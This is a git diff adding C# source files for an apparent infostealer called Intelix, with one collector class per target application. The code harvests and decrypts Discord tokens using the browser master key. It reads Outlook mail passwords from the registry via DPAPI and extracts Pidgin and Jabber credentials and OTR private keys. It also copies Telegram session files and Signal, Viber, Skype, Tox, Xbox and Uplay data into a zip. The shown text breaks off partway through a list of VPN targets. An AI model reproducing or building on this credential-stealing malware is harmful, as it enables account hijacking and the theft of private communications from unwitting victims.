file mode 100644 index 0000000..6950822 --- /dev/null +++ b/New/Intelix.Targets.Games/Uplay.cs @@ -0,0 +1,22 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class Uplay : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Ubisoft Game Launcher"); + if (Directory.Exists(text)) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Uplay"; + zip.AddDirectoryFiles(text, "Uplay"); + counterApplications.Files.Add(text + " => \\Uplay"); + counterApplications.Files.Add("Uplay\\"); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/XBox.cs b/New/Intelix.Targets.Games/XBox.cs new file mode 100644 index 0000000..5e22270 --- /dev/null +++ b/New/Intelix.Targets.Games/XBox.cs @@ -0,0 +1,53 @@ +using System; +using System.IO; +using System.Linq; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class XBox : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Packages"); + if (!Directory.Exists(path)) + { + return; + } + string[] directories = Directory.GetDirectories(path, "Microsoft.Xbox*", SearchOption.TopDirectoryOnly); + if (directories == null || directories.Length == 0) + { + return; + } + string[] source = new string[9] { ".ini", ".cfg", ".json", ".xml", ".log", ".dat", ".db", ".yaml", ".txt" }; + string[] array = directories; + foreach (string text in array) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Xbox"; + string[] files = Directory.GetFiles(text, "*.*", SearchOption.AllDirectories); + foreach (string text2 in files) + { + try + { + FileInfo fileInfo = new FileInfo(text2); + if (fileInfo.Length < 10000000 && source.Contains(fileInfo.Extension.ToLower())) + { + string path2 = text2.Substring(text.Length).TrimStart(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar); + string text3 = Path.Combine("Xbox", Path.GetFileName(text), path2).Replace('\\', '/'); + zip.AddFile(text3, File.ReadAllBytes(fileInfo.FullName)); + counterApplications.Files.Add(fileInfo.FullName + " => " + text3); + } + } + catch + { + } + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Xbox\\"); + counter.Games.Add(counterApplications); + } + } + } +} diff --git a/New/Intelix.Targets.Messangers/._Discord.cs b/New/Intelix.Targets.Messangers/._Discord.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Discord.cs differ diff --git a/New/Intelix.Targets.Messangers/._Element.cs b/New/Intelix.Targets.Messangers/._Element.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Element.cs differ diff --git a/New/Intelix.Targets.Messangers/._Icq.cs b/New/Intelix.Targets.Messangers/._Icq.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Icq.cs differ diff --git a/New/Intelix.Targets.Messangers/._Jabber.cs b/New/Intelix.Targets.Messangers/._Jabber.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Jabber.cs differ diff --git a/New/Intelix.Targets.Messangers/._MicroSIP.cs b/New/Intelix.Targets.Messangers/._MicroSIP.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._MicroSIP.cs differ diff --git a/New/Intelix.Targets.Messangers/._Outlook.cs b/New/Intelix.Targets.Messangers/._Outlook.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Outlook.cs differ diff --git a/New/Intelix.Targets.Messangers/._Pidgin.cs b/New/Intelix.Targets.Messangers/._Pidgin.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Pidgin.cs differ diff --git a/New/Intelix.Targets.Messangers/._Signal.cs b/New/Intelix.Targets.Messangers/._Signal.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Signal.cs differ diff --git a/New/Intelix.Targets.Messangers/._Skype.cs b/New/Intelix.Targets.Messangers/._Skype.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Skype.cs differ diff --git a/New/Intelix.Targets.Messangers/._Telegram.cs b/New/Intelix.Targets.Messangers/._Telegram.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Telegram.cs differ diff --git a/New/Intelix.Targets.Messangers/._Tox.cs b/New/Intelix.Targets.Messangers/._Tox.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Tox.cs differ diff --git a/New/Intelix.Targets.Messangers/._Viber.cs b/New/Intelix.Targets.Messangers/._Viber.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Messangers/._Viber.cs differ diff --git a/New/Intelix.Targets.Messangers/Discord.cs b/New/Intelix.Targets.Messangers/Discord.cs new file mode 100644 index 0000000..b72f2f8 --- /dev/null +++ b/New/Intelix.Targets.Messangers/Discord.cs @@ -0,0 +1,163 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading.Tasks; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Messangers; + +public class Discord : ITarget +{ + private static readonly Regex _tokenRegex = new Regex("(mfa\\.[\\w-]{80,})|((MT|OD)[\\w-]{22,24}\\.[\\w-]{6}\\.[\\w-]{25,110})", RegexOptions.IgnoreCase | RegexOptions.Compiled); + + private static readonly Regex _encryptedRegex = new Regex("\"dQw4w9WgXcQ:([^\"]+)\"", RegexOptions.IgnoreCase | RegexOptions.Compiled); + + public void Collect(InMemoryZip zip, Counter counter) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Discord"; + counterApplications.Files.Add("Discord\\"); + Task task = Task.Run(delegate + { + Parallel.ForEach(Paths.Discord, delegate(string path) + { + string text = path + "\\Local Storage\\leveldb"; + if (Directory.Exists(text)) + { + string localstate = path + "\\Local State"; + List list = TokensGrabber(text, localstate); + if (list.Any()) + { + string browserName = Paths.GetBrowserName(path); + string text2 = "Discord\\" + browserName + ".txt"; + counterApplications.Files.Add(path + " => " + text2); + zip.AddTextFile(text2, string.Join("\n", list)); + } + } + }); + }); + Task task2 = Task.Run(delegate + { + Parallel.ForEach(Paths.Chromium, delegate(string path) + { + if (Directory.Exists(path)) + { + Parallel.ForEach(Directory.GetDirectories(path), delegate(string profile) + { + string text = profile + "\\Local Storage\\leveldb"; + if (Directory.Exists(text)) + { + string localstate = path + "\\Local State"; + List list = TokensGrabber(text, localstate); + if (list.Any()) + { + string browserName = Paths.GetBrowserName(path); + string text2 = "Discord\\" + browserName + " " + Path.GetFileName(profile) + ".txt"; + counterApplications.Files.Add(path + " => " + text2); + zip.AddTextFile(text2, string.Join("\n", list)); + } + } + }); + } + }); + }); + Task.WaitAll(task, task2); + if (counterApplications.Files.Count() > 0) + { + counter.Messangers.Add(counterApplications); + } + } + + private List TokensGrabber(string localstorage, string localstate) + { + List source = SearchFiles(localstorage); + ConcurrentBag tokens = new ConcurrentBag(); + ConcurrentBag tokensEncrypted = new ConcurrentBag(); + Parallel.ForEach(source, delegate(string localdb) + { + try + { + string content = File.ReadAllText(localdb); + Parallel.ForEach(SearchToken(content), delegate(string token) + { + tokens.Add(token); + }); + Parallel.ForEach(SearchEncryptedTokens(content), delegate(string token) + { + tokensEncrypted.Add(token); + }); + } + catch + { + } + }); + ConcurrentBag distinctTokens = new ConcurrentBag(tokens.Distinct()); + if (!tokensEncrypted.Any()) + { + return distinctTokens.Distinct().ToList(); + } + byte[] key = LocalState.MasterKeyV10(localstate); + if (key == null) + { + return distinctTokens.Distinct().ToList(); + } + Parallel.ForEach(tokensEncrypted.Distinct(), delegate(string encrypted) + { + try + { + byte[] array = AesGcm.DecryptBrowser(Convert.FromBase64String(encrypted), key, null, checkprefix: false); + if (array != null) + { + distinctTokens.Add(Encoding.UTF8.GetString(array).Trim()); + } + } + catch + { + } + }); + return distinctTokens.Distinct().ToList(); + } + + private List SearchFiles(string path) + { + ConcurrentBag locals = new ConcurrentBag(); + string[] allowedExtensions = new string[3] { ".log", ".ldb", ".sqlite" }; + Parallel.ForEach(Directory.GetFiles(path), delegate(string file) + { + if (allowedExtensions.Contains(Path.GetExtension(file))) + { + locals.Add(file); + } + }); + return locals.ToList(); + } + + private List ExtractMatches(string content, Regex regex) + { + HashSet hashSet = new HashSet(StringComparer.OrdinalIgnoreCase); + foreach (Match item in regex.Matches(content)) + { + string value = item.Groups[1].Value; + if (!string.IsNullOrWhiteSpace(value)) + { + hashSet.Add(value); + } + } + return hashSet.ToList(); + } + + private List SearchToken(string content) + { + return ExtractMatches(content, _tokenRegex); + } + + private List SearchEncryptedTokens(string content) + { + return ExtractMatches(content, _encryptedRegex); + } +} diff --git a/New/Intelix.Targets.Messangers/Element.cs b/New/Intelix.Targets.Messangers/Element.cs new file mode 100644 index 0000000..62e4961 --- /dev/null +++ b/New/Intelix.Targets.Messangers/Element.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Element : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Element\\Local Storage\\leveldb"); + if (Directory.Exists(text)) + { + string text2 = "Element\\leveldb"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Element"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/Icq.cs b/New/Intelix.Targets.Messangers/Icq.cs new file mode 100644 index 0000000..953988a --- /dev/null +++ b/New/Intelix.Targets.Messangers/Icq.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Icq : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "ICQ", "0001"); + if (Directory.Exists(text)) + { + string text2 = "ICQ\\0001"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "ICQ"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/Jabber.cs b/New/Intelix.Targets.Messangers/Jabber.cs new file mode 100644 index 0000000..eccac81 --- /dev/null +++ b/New/Intelix.Targets.Messangers/Jabber.cs @@ -0,0 +1,43 @@ +using System; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Jabber : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); + string[] source = new string[3] + { + folderPath + "\\.purple\\", + folderPath + "\\Psi\\profiles\\default\\", + folderPath + "\\Psi+\\profiles\\default\\" + }; + string[] files2 = new string[4] { "accounts.xml", "otr.fingerprints", "otr.keys", "otr.private_key" }; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Jabber"; + Parallel.ForEach(source, delegate(string dir) + { + if (Directory.Exists(dir)) + { + Parallel.ForEach(files2, delegate(string file2) + { + if (File.Exists(dir + file2)) + { + string text = "Jabber\\" + file2; + zip.AddFile(text, File.ReadAllBytes(dir + file2)); + counterApplications.Files.Add(dir + file2 + " => " + text); + } + }); + } + }); + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Jabber\\"); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/MicroSIP.cs b/New/Intelix.Targets.Messangers/MicroSIP.cs new file mode 100644 index 0000000..924c45d --- /dev/null +++ b/New/Intelix.Targets.Messangers/MicroSIP.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class MicroSIP : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MicroSIP"); + if (Directory.Exists(text)) + { + string text2 = "MicroSIP\\"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "MicroSIP"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/Outlook.cs b/New/Intelix.Targets.Messangers/Outlook.cs new file mode 100644 index 0000000..e307b27 --- /dev/null +++ b/New/Intelix.Targets.Messangers/Outlook.cs @@ -0,0 +1,152 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; +using Microsoft.Win32; + +namespace Intelix.Targets.Messangers; + +public class Outlook : ITarget +{ + private static readonly Regex MailAddressRx = new Regex("^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$", RegexOptions.Compiled); + + private static readonly Regex HostnameRx = new Regex("^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$", RegexOptions.Compiled); + + private static readonly string[] RegistryRoots = new string[4] { "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676" }; + + private static readonly string[] KeysToCheck = new string[28] + { + "SMTP Email Address", "SMTP Server", "POP3 Server", "POP3 User Name", "SMTP User Name", "NNTP Email Address", "NNTP User Name", "NNTP Server", "IMAP Server", "IMAP User Name", + "Email", "HTTP User", "HTTP Server URL", "POP3 User", "IMAP User", "HTTPMail User Name", "HTTPMail Server", "SMTP User", "POP3 Password2", "IMAP Password2", + "NNTP Password2", "HTTPMail Password2", "SMTP Password2", "POP3 Password", "IMAP Password", "NNTP Password", "HTTPMail Password", "SMTP Password" + }; + + public void Collect(InMemoryZip zip, Counter counter) + { + StringBuilder stringBuilder = new StringBuilder(); + string[] registryRoots = RegistryRoots; + foreach (string rootPath in registryRoots) + { + stringBuilder.Append(ReadRegistryTree(rootPath)); + } + if (stringBuilder.Length != 0) + { + string text = Path.Combine("Outlook", "Outlook.txt"); + zip.AddTextFile(text, stringBuilder.ToString()); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Outlook"; + registryRoots = RegistryRoots; + foreach (string text2 in registryRoots) + { + counterApplications.Files.Add(text2 + " => " + text); + } + counterApplications.Files.Add(text); + counter.Applications.Add(counterApplications); + } + } + + private string ReadRegistryTree(string rootPath) + { + StringBuilder stringBuilder = new StringBuilder(); + Stack stack = new Stack(); + stack.Push(rootPath); + while (stack.Count > 0) + { + string text = stack.Pop(); + using RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(text, writable: false); + if (registryKey == null) + { + continue; + } + string[] keysToCheck = KeysToCheck; + foreach (string text2 in keysToCheck) + { + object value = registryKey.GetValue(text2); + if (value != null) + { + string value2 = FormatValue(text2, value); + if (!string.IsNullOrEmpty(value2)) + { + stringBuilder.AppendLine(value2); + } + } + } + keysToCheck = registryKey.GetSubKeyNames(); + foreach (string path in keysToCheck) + { + try + { + stack.Push(Path.Combine(text, path)); + } + catch + { + } + } + } + if (stringBuilder.Length > 0) + { + stringBuilder.AppendLine(); + } + return stringBuilder.ToString(); + } + + private string FormatValue(string valueName, object raw) + { + if (raw is byte[] array) + { + string text = DecryptValue(array); + if (!string.IsNullOrEmpty(text)) + { + return valueName + ": " + text; + } + try + { + string text2 = Encoding.UTF8.GetString(array).Replace("\0", ""); + if (!string.IsNullOrWhiteSpace(text2)) + { + return valueName + ": " + text2; + } + } + catch + { + } + return null; + } + string text3 = raw.ToString(); + if (string.IsNullOrWhiteSpace(text3)) + { + return null; + } + if (!HostnameRx.IsMatch(text3)) + { + MailAddressRx.IsMatch(text3); + } + return valueName + ": " + text3; + } + + private static string DecryptValue(byte[] encrypted) + { + if (encrypted == null || encrypted.Length <= 1) + { + return null; + } + try + { + byte[] array = new byte[encrypted.Length - 1]; + Buffer.BlockCopy(encrypted, 1, array, 0, array.Length); + byte[] array2 = DpApi.Decrypt(array); + if (array2 == null || array2.Length == 0) + { + return null; + } + return Encoding.UTF8.GetString(array2).TrimEnd(default(char)); + } + catch + { + return null; + } + } +} diff --git a/New/Intelix.Targets.Messangers/Pidgin.cs b/New/Intelix.Targets.Messangers/Pidgin.cs new file mode 100644 index 0000000..d2eae8e --- /dev/null +++ b/New/Intelix.Targets.Messangers/Pidgin.cs @@ -0,0 +1,99 @@ +using System; +using System.IO; +using System.Text; +using System.Xml; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Pidgin : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), ".purple"); + if (Directory.Exists(text)) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Pidgin"; + CollectAccounts(zip, text, counterApplications); + CollectLogs(zip, text, counterApplications); + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Pidgin\\"); + counter.Messangers.Add(counterApplications); + } + } + } + + private void CollectLogs(InMemoryZip zip, string pidginRoot, Counter.CounterApplications counterApplications) + { + try + { + string text = Path.Combine(pidginRoot, "logs"); + if (Directory.Exists(text)) + { + string text2 = Path.Combine("Pidgin", "chatlogs"); + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + } + } + catch + { + } + } + + private void CollectAccounts(InMemoryZip zip, string pidginRoot, Counter.CounterApplications counterApplications) + { + try + { + string text = Path.Combine(pidginRoot, "accounts.xml"); + if (!File.Exists(text)) + { + return; + } + StringBuilder stringBuilder = new StringBuilder(); + XmlDocument xmlDocument = new XmlDocument(); + using (XmlReader reader = XmlReader.Create(text, new XmlReaderSettings + { + IgnoreComments = true, + IgnoreWhitespace = true + })) + { + xmlDocument.Load(reader); + } + XmlElement documentElement = xmlDocument.DocumentElement; + if (documentElement == null) + { + return; + } + foreach (XmlNode childNode in documentElement.ChildNodes) + { + if (childNode.ChildNodes.Count >= 3) + { + XmlNode xmlNode2 = childNode.ChildNodes[0]; + XmlNode xmlNode3 = childNode.ChildNodes[1]; + XmlNode xmlNode4 = childNode.ChildNodes[2]; + string text2 = xmlNode2?.InnerText; + string text3 = xmlNode3?.InnerText; + string text4 = xmlNode4?.InnerText; + if (!string.IsNullOrEmpty(text2) && !string.IsNullOrEmpty(text3) && !string.IsNullOrEmpty(text4)) + { + stringBuilder.AppendLine("Protocol: " + text2); + stringBuilder.AppendLine("Username: " + text3); + stringBuilder.AppendLine("Password: " + text4); + stringBuilder.AppendLine(); + } + } + } + if (stringBuilder.Length != 0) + { + string text5 = Path.Combine("Pidgin", "accounts.txt"); + zip.AddTextFile(text5, stringBuilder.ToString()); + counterApplications.Files.Add(text + " => " + text5); + } + } + catch + { + } + } +} diff --git a/New/Intelix.Targets.Messangers/Signal.cs b/New/Intelix.Targets.Messangers/Signal.cs new file mode 100644 index 0000000..2cb4bfc --- /dev/null +++ b/New/Intelix.Targets.Messangers/Signal.cs @@ -0,0 +1,43 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Signal : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Signal"); + if (!Directory.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Signal"; + string[] array = new string[4] { "databases", "Session Storage", "Local Storage", "sql" }; + foreach (string path in array) + { + string text2 = Path.Combine(text, path); + if (Directory.Exists(text2)) + { + string text3 = Path.Combine("Signal", path); + zip.AddDirectoryFiles(text2, text3); + counterApplications.Files.Add(text2 + " => " + text3); + } + } + string text4 = Path.Combine(text, "config.json"); + if (File.Exists(text4)) + { + string text5 = Path.Combine("Signal", "config.json"); + zip.AddFile(text5, File.ReadAllBytes(text4)); + counterApplications.Files.Add(text4 + " => " + text5); + counterApplications.Files.Add(text5); + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Signal\\"); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/Skype.cs b/New/Intelix.Targets.Messangers/Skype.cs new file mode 100644 index 0000000..dc57d0e --- /dev/null +++ b/New/Intelix.Targets.Messangers/Skype.cs @@ -0,0 +1,24 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Skype : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft", "Skype for Desktop", "Local Storage"); + if (Directory.Exists(text)) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Skype"; + string text2 = Path.Combine("Skype", "Local Storage"); + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counterApplications.Files.Add("Skype\\"); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/Telegram.cs b/New/Intelix.Targets.Messangers/Telegram.cs new file mode 100644 index 0000000..78c14be --- /dev/null +++ b/New/Intelix.Targets.Messangers/Telegram.cs @@ -0,0 +1,163 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Telegram : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Telegram"; + Parallel.ForEach(FindAllMatches("tdata"), delegate(string tdata) + { + string targetPath = Path.GetFileName(tdata.Remove(tdata.Length - 6, 6)) + RandomStrings.GenerateHashTag(); + Copydata(tdata, targetPath, zip, counterApplications); + }); + if (counterApplications.Files.Count > 0) + { + counter.Messangers.Add(counterApplications); + } + } + + private void AddIfMatch(FileInfo fileInfo, string entryPath, InMemoryZip zip) + { + string name = fileInfo.Name; + if (name.EndsWith("s") && name.Length == 17) + { + zip.AddFile(entryPath, File.ReadAllBytes(fileInfo.FullName)); + } + else if (name.StartsWith("usertag") || name.StartsWith("settings") || name.StartsWith("key_data") || name.StartsWith("configs") || name.StartsWith("maps")) + { + zip.AddFile(entryPath, File.ReadAllBytes(fileInfo.FullName)); + } + } + + private void Copydata(string sourceDir, string targetPath, InMemoryZip zip, Counter.CounterApplications counterApplications) + { + ConcurrentBag matchedNames = new ConcurrentBag(); + bool addedAny = false; + Parallel.ForEach(Directory.GetFiles(sourceDir), delegate(string filePath) + { + try + { + FileInfo fileInfo = new FileInfo(filePath); + if (fileInfo.Length <= 7120) + { + string entryPath = targetPath + "\\" + fileInfo.Name; + if (fileInfo.Name.EndsWith("s") && fileInfo.Name.Length == 17) + { + matchedNames.Add(fileInfo.Name); + } + _ = counterApplications.Files.Count; + AddIfMatch(fileInfo, entryPath, zip); + if ((fileInfo.Name.EndsWith("s") && fileInfo.Name.Length == 17) || fileInfo.Name.StartsWith("usertag") || fileInfo.Name.StartsWith("settings") || fileInfo.Name.StartsWith("key_data") || fileInfo.Name.StartsWith("configs") || fileInfo.Name.StartsWith("maps")) + { + addedAny = true; + } + } + } + catch + { + } + }); + Parallel.ForEach(matchedNames, delegate(string name) + { + try + { + string dirPath = Path.Combine(sourceDir, name); + dirPath = dirPath.Remove(dirPath.Length - 1); + if (Directory.Exists(dirPath)) + { + Parallel.ForEach(Directory.GetFiles(dirPath), delegate(string filePath) + { + try + { + FileInfo fileInfo = new FileInfo(filePath); + if (fileInfo.Length <= 7120) + { + string entryPath = targetPath + "\\" + Path.GetFileName(dirPath) + "\\" + fileInfo.Name; + AddIfMatch(fileInfo, entryPath, zip); + if ((fileInfo.Name.EndsWith("s") && fileInfo.Name.Length == 17) || fileInfo.Name.StartsWith("usertag") || fileInfo.Name.StartsWith("settings") || fileInfo.Name.StartsWith("key_data") || fileInfo.Name.StartsWith("configs") || fileInfo.Name.StartsWith("maps")) + { + addedAny = true; + } + } + } + catch + { + } + }); + } + } + catch + { + } + }); + if (addedAny) + { + counterApplications.Files.Add(sourceDir + " => " + targetPath); + } + } + + private List FindInAppData(string folderName) + { + if (string.IsNullOrEmpty(folderName)) + { + return new List(); + } + ConcurrentDictionary found = new ConcurrentDictionary(StringComparer.OrdinalIgnoreCase); + string[] array = new string[2] + { + Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), + Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + }; + foreach (string text in array) + { + if (string.IsNullOrEmpty(text) || !Directory.Exists(text)) + { + continue; + } + try + { + Parallel.ForEach(Directory.EnumerateDirectories(text, "*", SearchOption.TopDirectoryOnly), delegate(string dir1) + { + try + { + string path = Path.Combine(dir1, folderName); + if (Directory.Exists(path)) + { + found.TryAdd(Path.GetFullPath(path), 0); + } + } + catch + { + } + }); + } + catch + { + } + } + return new List(found.Keys); + } + + private List FindAllMatches(string folderName) + { + ConcurrentDictionary set = new ConcurrentDictionary(StringComparer.OrdinalIgnoreCase); + Parallel.ForEach(ProcessWindows.FindFolder(folderName), delegate(string p) + { + set.TryAdd(p, 0); + }); + Parallel.ForEach(FindInAppData(folderName), delegate(string p) + { + set.TryAdd(p, 0); + }); + return new List(set.Keys); + } +} diff --git a/New/Intelix.Targets.Messangers/Tox.cs b/New/Intelix.Targets.Messangers/Tox.cs new file mode 100644 index 0000000..c390f7a --- /dev/null +++ b/New/Intelix.Targets.Messangers/Tox.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Tox : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Tox"); + if (Directory.Exists(text)) + { + string text2 = "Tox"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Tox"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Messangers/Viber.cs b/New/Intelix.Targets.Messangers/Viber.cs new file mode 100644 index 0000000..af90981 --- /dev/null +++ b/New/Intelix.Targets.Messangers/Viber.cs @@ -0,0 +1,30 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Messangers; + +public class Viber : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "ViberPC", "data"); + if (Directory.Exists(text)) + { + string entry = "Viber"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Viber"; + Array.ForEach(Directory.GetFiles(text), delegate(string file) + { + zip.AddFile(entry + "\\" + Path.GetFileName(file), File.ReadAllBytes(file)); + }); + Array.ForEach(Directory.GetDirectories(text), delegate(string dir) + { + zip.AddDirectoryFiles(dir, entry); + }); + counterApplications.Files.Add(text + " => " + entry); + counterApplications.Files.Add(entry); + counter.Messangers.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/._Cisco.cs b/New/Intelix.Targets.Vpn/._Cisco.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._Cisco.cs differ diff --git a/New/Intelix.Targets.Vpn/._CyberGhost.cs b/New/Intelix.Targets.Vpn/._CyberGhost.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._CyberGhost.cs differ diff --git a/New/Intelix.Targets.Vpn/._ExpressVPN.cs b/New/Intelix.Targets.Vpn/._ExpressVPN.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._ExpressVPN.cs differ diff --git a/New/Intelix.Targets.Vpn/._Hamachi.cs b/New/Intelix.Targets.Vpn/._Hamachi.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._Hamachi.cs differ diff --git a/New/Intelix.Targets.Vpn/._HideMyName.cs b/New/Intelix.Targets.Vpn/._HideMyName.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._HideMyName.cs differ diff --git a/New/Intelix.Targets.Vpn/._IpVanish.cs b/New/Intelix.Targets.Vpn/._IpVanish.cs 